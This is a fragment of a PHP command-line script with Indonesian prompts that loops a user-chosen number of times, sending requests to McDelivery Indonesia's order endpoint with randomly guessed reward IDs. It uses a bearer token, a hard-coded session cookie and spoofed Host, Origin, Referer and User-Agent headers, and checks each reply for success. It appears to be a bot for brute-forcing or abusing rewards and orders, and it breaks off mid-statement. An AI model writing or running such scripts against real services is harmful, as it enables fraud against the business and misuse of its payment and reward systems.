echo "[?] Jumlah [pesanan] : ";
$loop = trim(fgets(STDIN));
for ($x = 0; $x < $loop; $x++) {
$rand = substr(str_shuffle(str_repeat('0123456789', mt_rand(1,3))), 1, 3);
$url = "https://www.mcdelivery.co.id/id/getOrder.html";
$data = "{\"rewardId\":\"2311180$rand\",\"rewardTransactionId\":\"$trxid\"}";
$headers = array();
$headers[] = "Host: https://payment.linkaja.id/checkout/payment";
$headers[] = "Accept: application/json, text/plain, */*";
$headers[] = "Authorization: Bearer $bearer";
$headers[] = "User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36";
$headers[] = "Content-Type: application/json";
$headers[] = "Origin: subduedenviousembeds.luqyhanik.repl.co";
$headers[] = "Referer: https://www.mcdelivery.co.id/m/id/mobile/payment.html";
$headers[] = "Accept-Encoding: gzip, deflate";
$headers[] = "Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,ms;q=0.6";
$headers[] = "Cookie: _ga=GA1.3.770946611.1584431943; _gid=GA1.3.168000598.1584431943; TS0100d305=0162c9cb490990834a7708193e20bbd775eae933ce3e50f34503ef106b69d7ceacc5ecf66e5fb6ca7a51870037152284bafaf2991d";
$headers[] = "Connection: close";
$exec = request($url, $data, $headers);
if(strpos($exec, '"data":"Success"') !== false)
